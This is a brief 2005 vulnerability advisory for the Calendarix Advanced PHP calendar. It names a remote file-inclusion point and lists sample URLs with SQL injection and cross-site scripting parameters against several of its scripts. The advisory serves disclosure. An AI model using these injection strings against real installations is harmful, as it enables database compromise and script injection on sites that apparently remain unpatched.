/***********************************************
* Advisorie : 01-0005-15
* title: multiple vulnerability
* Software: Calendarix Advanced 
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/


- Affected software description:

Webcalendar is a web software write in php y mysql 

- Expoit:

	Include 

	line 16 
	admin/cal_admintop.php:include_once ($calpath."cal_utils.php");

	xss and sql injection

	line 122 - 160
	cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
	cal_pophols.php?id=999'[sql]/*	
	line 23
	calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
	line 194 - 196
	cal_week.php?op=week&catview= 999'[sql]/*
	line 34 - 39
	cal_cat.php?op=cats&catview=999'[sql]*/


- How to fix:

	Vendor no responds

- Credits:

	DarkBicho
	Email: darkbicho@gmail.com
	Web: http://www.swp-scene.org


- Grettings:
	"A mi Team SWP"
	" Viva el Peru Carajo"

-- 
- - - - - - - - - - - - - - - - - - - - - - - - - 
Miguel Sumaran (DarkBicho)
webpage: http://www.darkbicho.tk/
Team :  http://www.swp-scene.org/
Made in Peru
- - - - - - - - - - - - - - - - - - - - - - - - -